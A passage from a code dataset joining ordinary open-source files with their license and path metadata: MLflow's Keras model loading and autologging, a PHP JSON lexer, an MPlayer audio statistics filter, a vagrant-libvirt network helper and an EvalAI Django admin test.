CloudPickle and restores them automatically when the model is
loaded with :py:func:`mlflow.keras.load_model` and
:py:func:`mlflow.pyfunc.load_model`.
"""
import cloudpickle
custom_objects_path = os.path.join(path, _CUSTOM_OBJECTS_SAVE_PATH)
with open(custom_objects_path, "wb") as out_f:
cloudpickle.dump(custom_objects, out_f)
def _load_model(model_path, keras_module, **kwargs):
keras_models = importlib.import_module(keras_module.__name__ + ".models")
custom_objects = kwargs.pop("custom_objects", {})
custom_objects_path = None
if os.path.isdir(model_path):
if os.path.isfile(os.path.join(model_path, _CUSTOM_OBJECTS_SAVE_PATH)):
custom_objects_path = os.path.join(model_path, _CUSTOM_OBJECTS_SAVE_PATH)
model_path = os.path.join(model_path, _MODEL_SAVE_PATH)
if custom_objects_path is not None:
import cloudpickle
with open(custom_objects_path, "rb") as in_f:
pickled_custom_objects = cloudpickle.load(in_f)
pickled_custom_objects.update(custom_objects)
custom_objects = pickled_custom_objects
from distutils.version import StrictVersion
if StrictVersion(keras_module.__version__.split('-')[0]) >= StrictVersion("2.2.3"):
# NOTE: Keras 2.2.3 does not work with unicode paths in python2. Pass in h5py.File instead
# of string to avoid issues.
import h5py
with h5py.File(os.path.abspath(model_path), "r") as model_path:
return keras_models.load_model(model_path, custom_objects=custom_objects, **kwargs)
else:
# NOTE: Older versions of Keras only handle filepath.
return keras_models.load_model(model_path, custom_objects=custom_objects, **kwargs)
class _KerasModelWrapper:
def __init__(self, keras_model, graph, sess):
self.keras_model = keras_model
self._graph = graph
self._sess = sess
def predict(self, dataframe):
# In TensorFlow < 2.0, we use a graph and session to predict
if self._graph is not None:
with self._graph.as_default():
with self._sess.as_default():
predicted = pd.DataFrame(self.keras_model.predict(dataframe.values))
# In TensorFlow >= 2.0, we do not use a graph and session to predict
else:
predicted = pd.DataFrame(self.keras_model.predict(dataframe.values))
predicted.index = dataframe.index
return predicted
def _load_pyfunc(path):
"""
Load PyFunc implementation. Called by ``pyfunc.load_pyfunc``.
:param path: Local filesystem path to the MLflow Model with the ``keras`` flavor.
"""
import tensorflow as tf
if os.path.isfile(os.path.join(path, _KERAS_MODULE_SPEC_PATH)):
with open(os.path.join(path, _KERAS_MODULE_SPEC_PATH), "r") as f:
keras_module = importlib.import_module(f.read())
else:
import keras
keras_module = keras
K = importlib.import_module(keras_module.__name__ + ".backend")
if keras_module.__name__ == "tensorflow.keras" or K.backend() == 'tensorflow':
if LooseVersion(tf.__version__) < LooseVersion('2.0.0'):
graph = tf.Graph()
sess = tf.Session(graph=graph)
# By default tf backed models depend on the global graph and session.
# We create an use new Graph and Session and store them with the model
# This way the model is independent on the global state.
with graph.as_default():
with sess.as_default(): # pylint:disable=not-context-manager
K.set_learning_phase(0)
m = _load_model(path, keras_module=keras_module, compile=False)
return _KerasModelWrapper(m, graph, sess)
else:
K.set_learning_phase(0)
m = _load_model(path, keras_module=keras_module, compile=False)
return _KerasModelWrapper(m, None, None)
else:
raise MlflowException("Unsupported backend '%s'" % K._BACKEND)
def load_model(model_uri, **kwargs):
"""
Load a Keras model from a local file or a run.
Extra arguments are passed through to keras.load_model.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:return: A Keras model instance.
.. code-block:: python
:caption: Example
# Load persisted model as a Keras model or as a PyFunc, call predict() on a pandas DataFrame
keras_model = mlflow.keras.load_model("runs:/96771d893a5e46159d9f3b49bf9013e2" + "/models")
predictions = keras_model.predict(x_test)
"""
local_model_path = _download_artifact_from_uri(artifact_uri=model_uri)
flavor_conf = _get_flavor_configuration(model_path=local_model_path, flavor_name=FLAVOR_NAME)
keras_module = importlib.import_module(flavor_conf.get("keras_module", "keras"))
keras_model_artifacts_path = os.path.join(
local_model_path,
flavor_conf.get("data", _MODEL_SAVE_PATH))
return _load_model(model_path=keras_model_artifacts_path, keras_module=keras_module, **kwargs)
@experimental
def autolog():
# pylint: disable=E0611
"""
Enables automatic logging from Keras to MLflow. Autologging captures the following information:
**Metrics** and **Parameters**
- Training loss; validation loss; user-specified metrics
- Metrics associated with the ``EarlyStopping`` callbacks: ``stopped_epoch``,
``restored_epoch``, ``restore_best_weight``, ``last_epoch``, etc
- ``fit()`` or ``fit_generator()`` parameters; optimizer name; learning rate; epsilon
- ``fit()`` or ``fit_generator()`` parameters associated with ``EarlyStopping``: ``min_delta``,
``patience``, ``baseline``, ``restore_best_weights``, etc
**Artifacts**
- Model summary on training start
- `MLflow Model <https://mlflow.org/docs/latest/models.html>`_ (Keras model) on training end
.. code-block:: python
:caption: Example
import mlflow
import mlflow.keras
# Build, compile, enable autologging, and train your model
keras_model = ...
keras_model.compile(optimizer="rmsprop", loss="mse", metrics=["accuracy"])
# autolog your metrics, parameters, and model
mlflow.keras.autolog()
results = keras_model.fit(
x_train, y_train, epochs=20, batch_size=128, validation_data=(x_val, y_val))
``EarlyStopping Integration with Keras AutoLogging``
MLflow will detect if an ``EarlyStopping`` callback is used in a ``fit()`` or
``fit_generator()`` call, and if the ``restore_best_weights`` parameter is set to be ``True``,
then MLflow will log the metrics associated with the restored model as a final, extra step.
The epoch of the restored model will also be logged as the metric ``restored_epoch``.
This allows for easy comparison between the actual metrics of the restored model and
the metrics of other models.
If ``restore_best_weights`` is set to be ``False``, then MLflow will not log an additional step.
Regardless of ``restore_best_weights``, MLflow will also log ``stopped_epoch``,
which indicates the epoch at which training stopped due to early stopping.
If training does not end due to early stopping, then ``stopped_epoch`` will be logged as ``0``.
MLflow will also log the parameters of the ``EarlyStopping`` callback,
excluding ``mode`` and ``verbose``.
"""
import keras
class __MLflowKerasCallback(keras.callbacks.Callback):
"""
Callback for auto-logging metrics and parameters.
Records available logs after each epoch.
Records model structural information as params when training begins
"""
def on_train_begin(self, logs=None): # pylint: disable=unused-argument
try_mlflow_log(mlflow.log_param, 'num_layers', len(self.model.layers))
try_mlflow_log(mlflow.log_param, 'optimizer_name', type(self.model.optimizer).__name__)
if hasattr(self.model.optimizer, 'lr'):
lr = self.model.optimizer.lr if \
type(self.model.optimizer.lr) is float \
else keras.backend.eval(self.model.optimizer.lr)
try_mlflow_log(mlflow.log_param, 'learning_rate', lr)
if hasattr(self.model.optimizer, 'epsilon'):
epsilon = self.model.optimizer.epsilon if \
type(self.model.optimizer.epsilon) is float \
else keras.backend.eval(self.model.optimizer.epsilon)
try_mlflow_log(mlflow.log_param, 'epsilon', epsilon)
sum_list = []
self.model.summary(print_fn=sum_list.append)
summary = '\n'.join(sum_list)
tempdir = tempfile.mkdtemp()
try:
summary_file = os.path.join(tempdir, "model_summary.txt")
with open(summary_file, 'w') as f:
f.write(summary)
try_mlflow_log(mlflow.log_artifact, local_path=summary_file)
finally:
shutil.rmtree(tempdir)
def on_epoch_end(self, epoch, logs=None):
if not logs:
return
try_mlflow_log(mlflow.log_metrics, logs, step=epoch)
def on_train_end(self, logs=None):
try_mlflow_log(log_model, self.model, artifact_path='model')
# As of Keras 2.4.0, Keras Callback implementations must define the following
# methods indicating whether or not the callback overrides functions for
# batch training/testing/inference
def _implements_train_batch_hooks(self): return False
def _implements_test_batch_hooks(self): return False
def _implements_predict_batch_hooks(self): return False
def _early_stop_check(callbacks):
if LooseVersion(keras.__version__) < LooseVersion('2.3.0'):
es_callback = keras.callbacks.EarlyStopping
else:
es_callback = keras.callbacks.callbacks.EarlyStopping
for callback in callbacks:
if isinstance(callback, es_callback):
return callback
return None
def _log_early_stop_callback_params(callback):
if callback:
try:
earlystopping_params = {'monitor': callback.monitor,
'min_delta': callback.min_delta,
'patience': callback.patience,
'baseline': callback.baseline,
'restore_best_weights': callback.restore_best_weights}
try_mlflow_log(mlflow.log_params, earlystopping_params)
except Exception: # pylint: disable=W0703
return
def _get_early_stop_callback_attrs(callback):
try:
return callback.stopped_epoch, callback.restore_best_weights, callback.patience
except Exception: # pylint: disable=W0703
return None
def _log_early_stop_callback_metrics(callback, history):
if callback:
callback_attrs = _get_early_stop_callback_attrs(callback)
if callback_attrs is None:
return
stopped_epoch, restore_best_weights, patience = callback_attrs
try_mlflow_log(mlflow.log_metric, 'stopped_epoch', stopped_epoch)
# Weights are restored only if early stopping occurs
if stopped_epoch != 0 and restore_best_weights:
restored_epoch = stopped_epoch - max(1, patience)
try_mlflow_log(mlflow.log_metric, 'restored_epoch', restored_epoch)
restored_metrics = {key: history.history[key][restored_epoch]
for key in history.history.keys()}
# Checking that a metric history exists
metric_key = next(iter(history.history), None)
if metric_key is not None:
last_epoch = len(history.history[metric_key])
try_mlflow_log(mlflow.log_metrics, restored_metrics, step=last_epoch)
def _run_and_log_function(self, original, args, kwargs, unlogged_params, callback_arg_index):
if not mlflow.active_run():
try_mlflow_log(mlflow.start_run)
auto_end_run = True
else:
auto_end_run = False
log_fn_args_as_params(original, args, kwargs, unlogged_params)
early_stop_callback = None
# Checking if the 'callback' argument of the function is set
if len(args) > callback_arg_index:
tmp_list = list(args)
early_stop_callback = _early_stop_check(tmp_list[callback_arg_index])
tmp_list[callback_arg_index] += [__MLflowKerasCallback()]
args = tuple(tmp_list)
elif 'callbacks' in kwargs:
early_stop_callback = _early_stop_check(kwargs['callbacks'])
kwargs['callbacks'] += [__MLflowKerasCallback()]
else:
kwargs['callbacks'] = [__MLflowKerasCallback()]
_log_early_stop_callback_params(early_stop_callback)
history = original(self, *args, **kwargs)
_log_early_stop_callback_metrics(early_stop_callback, history)
if auto_end_run:
try_mlflow_log(mlflow.end_run)
return history
@gorilla.patch(keras.Model)
def fit(self, *args, **kwargs):
original = gorilla.get_original_attribute(keras.Model, 'fit')
unlogged_params = ['self', 'x', 'y', 'callbacks', 'validation_data', 'verbose']
return _run_and_log_function(self, original, args, kwargs, unlogged_params, 5)
@gorilla.patch(keras.Model)
def fit_generator(self, *args, **kwargs):
original = gorilla.get_original_attribute(keras.Model, 'fit_generator')
unlogged_params = ['self', 'generator', 'callbacks', 'validation_data', 'verbose']
return _run_and_log_function(self, original, args, kwargs, unlogged_params, 4)
settings = gorilla.Settings(allow_hit=True, store_hit=True)
gorilla.apply(gorilla.Patch(keras.Model, 'fit', fit, settings=settings))
gorilla.apply(gorilla.Patch(keras.Model, 'fit_generator', fit_generator, settings=settings))
|
Python
|
Apache-2.0
|
AnesBenmerzoug/mlflow/mlflow/keras.py
|
322e1220-66bd-479c-ba47-f1331e49a950
|
[]
|
[]
|
<?php
declare(strict_types=1);
namespace Shin1x1\ToyJsonParser\Lexer;
use JetBrains\PhpStorm\Immutable;
use Shin1x1\ToyJsonParser\Lexer\Exception\LexerException;
use Shin1x1\ToyJsonParser\Lexer\Token\ColonToken;
use Shin1x1\ToyJsonParser\Lexer\Token\CommaToken;
use Shin1x1\ToyJsonParser\Lexer\Token\EofToken;
use Shin1x1\ToyJsonParser\Lexer\Token\FalseToken;
use Shin1x1\ToyJsonParser\Lexer\Token\LeftCurlyBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\LeftSquareBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\NullToken;
use Shin1x1\ToyJsonParser\Lexer\Token\NumberToken;
use Shin1x1\ToyJsonParser\Lexer\Token\RightCurlyBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\RightSquareBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\StringToken;
use Shin1x1\ToyJsonParser\Lexer\Token\Token;
use Shin1x1\ToyJsonParser\Lexer\Token\TrueToken;
final class Lexer
{
private int $length;
private int $position;
public function __construct(#[Immutable] private readonly string $json)
{
$this->length = strlen($this->json);
$this->position = 0;
}
public function getNextToken(): Token
{
do {
$ch = $this->consume();
if ($ch === null) {
return new EofToken();
}
} while ($this->isSkipCharacter($ch));
return match ($ch) {
'[' => new LeftSquareBracketToken(),
']' => new RightSquareBracketToken(),
'{' => new LeftCurlyBracketToken(),
'}' => new RightCurlyBracketToken(),
':' => new ColonToken(),
',' => new CommaToken(),
'"' => $this->getStringToken(),
'-', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9' => $this->getNumberToken($ch),
't' => $this->getLiteralToken('true', TrueToken::class),
'f' => $this->getLiteralToken('false', FalseToken::class),
'n' => $this->getLiteralToken('null', NullToken::class),
default => throw new LexerException('Invalid character ' . $ch),
};
}
private function isSkipCharacter(?string $ch): bool
{
return $ch === ' ' || $ch === "\n" || $ch === "\r" || $ch === "\t";
}
private function getStringToken(): StringToken
{
$str = '';
while (($ch = $this->consume()) !== null) {
if ($ch === '"') {
return new StringToken($str);
}
if ($ch !== '\\') {
$str .= $ch;
continue;
}
$str .= match ($ch = $this->consume()) {
'"' => '"',
'\\' => '\\',
'/' => '/',
'b' => chr(0x8),
'f' => "\f",
'n' => "\n",
'r' => "\r",
't' => "\t",
'u' => $this->getCharacterByCodePoint(),
default => '\\' . $ch,
};
}
throw new LexerException('No end of string');
}
private function getCharacterByCodePoint(): string
{
$codepoint = '';
for ($i = 0; $i < 4; $i++) {
$ch = $this->consume();
if ($ch !== null
&& ('0' <= $ch && $ch <= '9'
|| 'A' <= $ch && $ch <= 'F'
|| 'a' <= $ch && $ch <= 'f')) {
$codepoint .= $ch;
continue;
}
throw new LexerException('Invalid code point');
}
return mb_chr(hexdec($codepoint));
}
/**
* @see https://github.com/shin1x1/php8-toy-json-parser/blob/master/diagrams/number.png
*/
private function getNumberToken(string $ch): NumberToken
{
$number = $ch;
$state = match ($ch) {
'-' => 'MINUS',
'0' => 'INT_ZERO',
default => 'INT',
};
$isFloat = false;
$isDigit19 = fn($ch) => '1' <= $ch && $ch <= '9';
$isDigit = fn($ch) => '0' <= $ch && $ch <= '9';
$isExp = fn($ch) => $ch === 'e' || $ch === 'E';
while (true) {
$ch = $this->current();
switch ($state) {
case 'INT':
if ($isDigit($ch)) {
$number .= $this->consume();
break;
}
if ($ch === '.') {
$number .= $this->consume();
$state = 'DECIMAL_POINT';
break;
}
if ($isExp($ch)) {
$number .= $this->consume();
$state = 'EXP';
break;
}
break 2;
case 'MINUS':
if ($isDigit19($ch)) {
$number .= $this->consume();
$state = 'INT';
break;
}
if ($ch === '0') {
$number .= $this->consume();
$state = 'INT_ZERO';
break;
}
break 2;
case 'INT_ZERO':
if ($ch === '.') {
$number .= $this->consume();
$state = 'DECIMAL_POINT';
break;
}
if ($isDigit($ch)) {
throw new LexerException('Invalid number:' . $ch);
}
break 2;
case 'DECIMAL_POINT':
$isFloat = true;
if ($isDigit($ch)) {
$number .= $this->consume();
$state = 'DECIMAL_POINT_INT';
break;
}
break 2;
case 'DECIMAL_POINT_INT':
if ($isDigit($ch)) {
$number .= $this->consume();
break;
}
if ($isExp($ch)) {
$number .= $this->consume();
$state = 'EXP';
break;
}
break 2;
case 'EXP':
$isFloat = true;
if ($isDigit($ch) || $ch === '-' || $ch === '+') {
$number .= $this->consume();
$state = 'EXP_INT';
break;
}
break 2;
case 'EXP_INT':
if ($isDigit($ch)) {
$number .= $this->consume();
break;
}
break 2;
default:
break 2;
}
}
$lastCh = $number[strlen($number) - 1];
if ('0' <= $lastCh && $lastCh <= '9') {
return new NumberToken($isFloat ? (float)$number : (int)$number);
}
throw new LexerException('Invalid number:' . $ch);
}
private function getLiteralToken(string $expectedName, string $klass): TrueToken|FalseToken|NullToken
{
$name = $expectedName[0];
for ($i = 1; $i < strlen($expectedName); $i++) {
$ch = $this->consume();
if ($ch === null) {
throw new LexerException('Unexpected end of text');
}
$name .= $ch;
}
if ($name !== $expectedName) {
throw new LexerException('Unexpected literal ' . $name);
}
return new $klass;
}
private function current(): string
{
return $this->json[$this->position] ?? '';
}
private function consume(): ?string
{
if ($this->length <= $this->position) {
return null;
}
$ch = $this->current();
$this->position++;
return $ch;
}
}
|
PHP
|
MIT
|
shin1x1/toy-json-parser/PHP/src/Lexer/Lexer.php
|
f94aeb01-612b-4a92-88e1-cb81c5029e87
|
[{"tag": "USERNAME", "value": "shin1x1", "start": 3575, "end": 3582, "context": "));\n }\n\n /**\n * @see https://github.com/shin1x1/php8-toy-json-parser/blob/master/diagrams/number."}]
|
[{"tag": "USERNAME", "value": "shin1x1", "start": 3575, "end": 3582, "context": "));\n }\n\n /**\n * @see https://github.com/shin1x1/php8-toy-json-parser/blob/master/diagrams/number."}]
|
/*
* Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>
*
* This file is part of MPlayer.
*
* MPlayer is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* MPlayer is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with MPlayer; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <math.h>
#include "mp_msg.h"
#include "af.h"
#define MAX_DB 80
#define MIN_VAL 1E-8
struct af_stats {
long long n_samples;
double tsquare;
int max;
long long histogram[65536];
};
static inline int logdb(double v)
{
if (v > 1)
return 0;
if (v <= MIN_VAL)
return MAX_DB - 1;
return log(v) / -0.23025850929940456840179914546843642076;
}
static int stats_init(af_instance_t *af, struct af_stats *s, af_data_t *data)
{
int i;
if (!data)
return AF_ERROR;
*(af->data) = *data;
af->data->format = AF_FORMAT_S16_NE;
af->data->bps = 2;
s->n_samples = 0;
s->tsquare = 0;
s->max = 0;
for (i = 0; i < 65536; i++)
s->histogram[i] = 0;
return af_test_output(af, data);
}
static void stats_print(struct af_stats *s)
{
int i;
long long sum;
float v;
long long h[MAX_DB];
s->tsquare /= 32768 * 32768;
mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: n_samples: %lld\n", s->n_samples);
if (s->n_samples == 0)
return;
mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: mean_volume: -%d dB\n",
logdb(s->tsquare / s->n_samples));
mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: max_volume: -%d dB\n",
logdb(s->max / (32768.0 * 32768.0)));
for (i = 0; i < MAX_DB; i++)
h[i] = 0;
for (i = 0; i < 65536; i++) {
v = (i - 32768) / 32768.0;
h[logdb(v * v)] += s->histogram[i];
}
for (i = 0; i < MAX_DB; i++)
if (h[i] != 0)
break;
sum = 0;
for (; i < MAX_DB; i++) {
sum += h[i];
mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: histogram_%ddb: %lld\n",
i, h[i]);
if (sum > s->n_samples / 1000)
break;
}
}
static int control(struct af_instance_s *af, int cmd, void *arg)
{
struct af_stats *s = af->setup;
switch(cmd) {
case AF_CONTROL_REINIT:
return stats_init(af, s, arg);
case AF_CONTROL_PRE_DESTROY:
stats_print(s);
return AF_OK;
}
return AF_UNKNOWN;
}
static void uninit(struct af_instance_s *af)
{
free(af->data);
free(af->setup);
}
static af_data_t *play(struct af_instance_s *af, af_data_t *data)
{
struct af_stats *s = af->setup;
int16_t *a, *aend;
int v, v2;
a = data->audio;
aend = (int16_t *)((char *)data->audio + data->len);
s->n_samples += aend - a;
for (; a < aend; a++) {
v = *a;
v2 = v * v;
s->tsquare += v2;
s->histogram[v + 32768]++;
if (v2 > s->max)
s->max = v2;
}
return data;
}
static int af_open(af_instance_t *af)
{
af->control = control;
af->uninit = uninit;
af->play = play;
af->mul = 1;
af->data = malloc(sizeof(af_data_t));
af->setup = malloc(sizeof(struct af_stats));
if (af->data == NULL || af->setup == NULL)
return AF_ERROR;
return AF_OK;
}
const af_info_t af_info_stats = {
"Statistics audio filter",
"stats",
"Nicolas George",
"",
0,
af_open
};
|
C
|
MIT
|
Minaduki-Shigure/BeagleBone_Proj/mplayer/src/MPlayer-1.4/libaf/af_stats.c
|
74dde006-6826-4a71-815d-ed952e48df2c
|
[{"tag": "EMAIL", "value": "nicolas.george@normalesup.org", "start": 41, "end": 70, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file is part of MPlayer.\n *\n * MPlaye"}, {"tag": "NAME", "value": "Nicolas George", "start": 25, "end": 39, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file i"}]
|
[{"tag": "EMAIL", "value": "nicolas.george@normalesup.org", "start": 41, "end": 70, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file is part of MPlayer.\n *\n * MPlaye"}, {"tag": "NAME", "value": "Nicolas George", "start": 25, "end": 39, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file i"}]
|
require 'ipaddr'
require 'nokogiri'
require 'vagrant/util/network_ip'
class IPAddr
def get_mask
if @addr
_to_string(@mask_addr)
end
end
end
module VagrantPlugins
module ProviderLibvirt
module Util
module NetworkUtil
include Vagrant::Util::NetworkIP
def configured_networks(env, logger)
qemu_use_session = env[:machine].provider_config.qemu_use_session
management_network_device = env[:machine].provider_config.management_network_device
management_network_name = env[:machine].provider_config.management_network_name
management_network_address = env[:machine].provider_config.management_network_address
management_network_mode = env[:machine].provider_config.management_network_mode
management_network_mac = env[:machine].provider_config.management_network_mac
management_network_guest_ipv6 = env[:machine].provider_config.management_network_guest_ipv6
management_network_autostart = env[:machine].provider_config.management_network_autostart
management_network_pci_bus = env[:machine].provider_config.management_network_pci_bus
management_network_pci_slot = env[:machine].provider_config.management_network_pci_slot
management_network_domain = env[:machine].provider_config.management_network_domain
management_network_mtu = env[:machine].provider_config.management_network_mtu
logger.info "Using #{management_network_name} at #{management_network_address} as the management network #{management_network_mode} is the mode"
begin
management_network_ip = IPAddr.new(management_network_address)
rescue ArgumentError
raise Errors::ManagementNetworkError,
error_message: "#{management_network_address} is not a valid IP address"
end
# capture address into $1 and mask into $2
management_network_ip.inspect =~ /IPv4:(.*)\/(.*)>/
if Regexp.last_match(2) == '255.255.255.255'
raise Errors::ManagementNetworkError,
error_message: "#{management_network_address} does not include both an address and subnet mask"
end
if qemu_use_session
management_network_options = {
iface_type: :public_network,
dev: management_network_device,
mode: 'bridge',
type: 'bridge',
bus: management_network_pci_bus,
slot: management_network_pci_slot
}
else
management_network_options = {
iface_type: :private_network,
network_name: management_network_name,
ip: Regexp.last_match(1),
netmask: Regexp.last_match(2),
dhcp_enabled: true,
forward_mode: management_network_mode,
guest_ipv6: management_network_guest_ipv6,
autostart: management_network_autostart,
bus: management_network_pci_bus,
slot: management_network_pci_slot
}
end
unless management_network_mac.nil?
management_network_options[:mac] = management_network_mac
end
unless management_network_domain.nil?
management_network_options[:domain_name] = management_network_domain
end
unless management_network_mtu.nil?
management_network_options[:mtu] = management_network_mtu
end
unless management_network_pci_bus.nil? and management_network_pci_slot.nil?
management_network_options[:bus] = management_network_pci_bus
management_network_options[:slot] = management_network_pci_slot
end
if (env[:machine].config.vm.box &&
!env[:machine].provider_config.mgmt_attach)
raise Errors::ManagementNetworkRequired
end
# add management network to list of networks to check
# unless mgmt_attach set to false
networks = if env[:machine].provider_config.mgmt_attach
[management_network_options]
else
[]
end
env[:machine].config.vm.networks.each do |type, original_options|
logger.debug "In config found network type #{type} options #{original_options}"
# Options can be specified in Vagrantfile in short format (:ip => ...),
# or provider format # (:libvirt__network_name => ...).
# https://github.com/mitchellh/vagrant/blob/master/lib/vagrant/util/scoped_hash_override.rb
options = scoped_hash_override(original_options, :libvirt)
# store type in options
# use default values if not already set
options = {
iface_type: type,
netmask: options[:network_address] ?
IPAddr.new(options[:network_address]).get_mask :
'255.255.255.0',
dhcp_enabled: true,
forward_mode: 'nat'
}.merge(options)
if options[:type].to_s == 'dhcp' && options[:ip].nil?
options[:network_name] = options[:network_name] ?
options[:network_name] :
'vagrant-private-dhcp'
end
# add to list of networks to check
networks.push(options)
end
networks
end
# Return a list of all (active and inactive) Libvirt networks as a list
# of hashes with their name, network address and status (active or not)
def libvirt_networks(libvirt_client)
libvirt_networks = []
active = libvirt_client.list_networks
inactive = libvirt_client.list_defined_networks
# Iterate over all (active and inactive) networks.
active.concat(inactive).each do |network_name|
libvirt_network = libvirt_client.lookup_network_by_name(
network_name
)
# Parse ip address and netmask from the network xml description.
xml = Nokogiri::XML(libvirt_network.xml_desc)
ip = xml.xpath('/network/ip/@address').first
ip = ip.value if ip
netmask = xml.xpath('/network/ip/@netmask').first
netmask = netmask.value if netmask
dhcp_enabled = if xml.at_xpath('//network/ip/dhcp')
true
else
false
end
domain_name = xml.at_xpath('/network/domain/@name')
domain_name = domain_name.value if domain_name
# Calculate network address of network from ip address and
# netmask.
network_address = (network_address(ip, netmask) if ip && netmask)
libvirt_networks << {
name: network_name,
ip_address: ip,
netmask: netmask,
network_address: network_address,
dhcp_enabled: dhcp_enabled,
bridge_name: libvirt_network.bridge_name,
domain_name: domain_name,
created: true,
active: libvirt_network.active?,
autostart: libvirt_network.autostart?,
libvirt_network: libvirt_network
}
end
libvirt_networks
end
end
end
end
end
|
Ruby
|
MIT
|
alvistack/vagrant-libvirt-vagrant-libvirt/lib/vagrant-libvirt/util/network_util.rb
|
5921c854-e568-4776-826e-9119e4263c17
|
[{"tag": "IP_ADDRESS", "value": "255.255.255.0", "start": 5059, "end": 5072, "context": "address]).get_mask :\n '255.255.255.0',\n dhcp_enabled: true,\n "}, {"tag": "IP_ADDRESS", "value": "255.255.255.255", "start": 2035, "end": 2050, "context": "*)\\/(.*)>/\n\n if Regexp.last_match(2) == '255.255.255.255'\n raise Errors::ManagementNetworkError"}]
|
[{"tag": "IP_ADDRESS", "value": "255.255.255.0", "start": 5059, "end": 5072, "context": "address]).get_mask :\n '255.255.255.0',\n dhcp_enabled: true,\n "}, {"tag": "IP_ADDRESS", "value": "255.255.255.255", "start": 2035, "end": 2050, "context": "*)\\/(.*)>/\n\n if Regexp.last_match(2) == '255.255.255.255'\n raise Errors::ManagementNetworkError"}]
|
import os
import shutil
from datetime import timedelta
from django.contrib.admin.sites import AdminSite
from django.core.files.uploadedfile import SimpleUploadedFile
from django.contrib.auth.models import User
from django.utils import timezone
from allauth.account.models import EmailAddress
from rest_framework.test import APITestCase, APIClient
from challenges.models import Challenge, ChallengePhase
from hosts.models import ChallengeHostTeam
from jobs.models import Submission
from jobs.admin import SubmissionAdmin
from participants.models import ParticipantTeam, Participant
class BaseAPITestClass(APITestCase):
def setUp(self):
self.client = APIClient(enforce_csrf_checks=True)
self.user = User.objects.create(
username="someuser",
email="user@test.com",
password="secret_password",
)
EmailAddress.objects.create(
user=self.user, email="user@test.com", primary=True, verified=True
)
self.user1 = User.objects.create(
username="someuser1",
email="user1@test.com",
password="secret_password1",
)
EmailAddress.objects.create(
user=self.user1,
email="user1@test.com",
primary=True,
verified=True,
)
self.challenge_host_team = ChallengeHostTeam.objects.create(
team_name="Test Challenge Host Team", created_by=self.user
)
self.participant_team = ParticipantTeam.objects.create(
team_name="Participant Team for Challenge", created_by=self.user1
)
self.participant = Participant.objects.create(
user=self.user1,
status=Participant.SELF,
team=self.participant_team,
)
self.challenge = Challenge.objects.create(
title="Test Challenge",
description="Description for test challenge",
terms_and_conditions="Terms and conditions for test challenge",
submission_guidelines="Submission guidelines for test challenge",
creator=self.challenge_host_team,
start_date=timezone.now() - timedelta(days=2),
end_date=timezone.now() + timedelta(days=1),
published=False,
enable_forum=True,
anonymous_leaderboard=False,
)
try:
os.makedirs("/tmp/evalai")
except OSError:
pass
with self.settings(MEDIA_ROOT="/tmp/evalai"):
self.challenge_phase = ChallengePhase.objects.create(
name="Challenge Phase",
description="Description for Challenge Phase",
leaderboard_public=False,
is_public=False,
start_date=timezone.now() - timedelta(days=2),
end_date=timezone.now() + timedelta(days=1),
challenge=self.challenge,
test_annotation=SimpleUploadedFile(
"test_sample_file.txt",
b"Dummy file content",
content_type="text/plain",
),
)
self.submission = Submission.objects.create(
participant_team=self.participant_team,
challenge_phase=self.challenge_phase,
created_by=self.challenge_host_team.created_by,
status="submitted",
input_file=self.challenge_phase.test_annotation,
method_name="Test Method",
method_description="Test Description",
project_url="http://testserver/",
publication_url="http://testserver/",
is_public=True,
)
self.client.force_authenticate(user=self.user)
def tearDown(self):
shutil.rmtree("/tmp/evalai")
class MockRequest(object):
pass
request = MockRequest()
class SubmissionAdminTest(BaseAPITestClass):
"""
Test case for re-running submissions from admin
"""
def setUp(self):
super(SubmissionAdminTest, self).setUp()
self.app_admin = SubmissionAdmin(Submission, AdminSite())
def test_submit_job_to_worker(self):
Submission.objects.filter(status=self.submission.status).update(
status="finished"
)
queryset = Submission.objects.filter(status="finished")
self.app_admin.submit_job_to_worker(request, queryset)
self.assertEqual(
Submission.objects.filter(status="submitted").count(), 1
)
def test_make_submission_public(self):
# make all submissions private before test
Submission.objects.filter(is_public=self.submission.is_public).update(
is_public=False
)
queryset = Submission.objects.filter(is_public=False)
self.app_admin.make_submission_public(request, queryset)
self.assertEqual(Submission.objects.filter(is_public=True).count(), 1)
def test_make_submission_private(self):
# make all submissions public before test
Submission.objects.filter(is_public=False).update(
is_public=True
)
queryset = Submission.objects.filter(is_public=True)
self.app_admin.make_submission_private(request, queryset)
self.assertEqual(Submission.objects.filter(is_public=False).count(), 1)
|
Python
|
BSD-3-Clause
|
Mukul2000/EvalAI/tests/unit/jobs/test_admin.py
|
8c7576bb-32ea-4f54-97f9-1fb8958cdb66
|
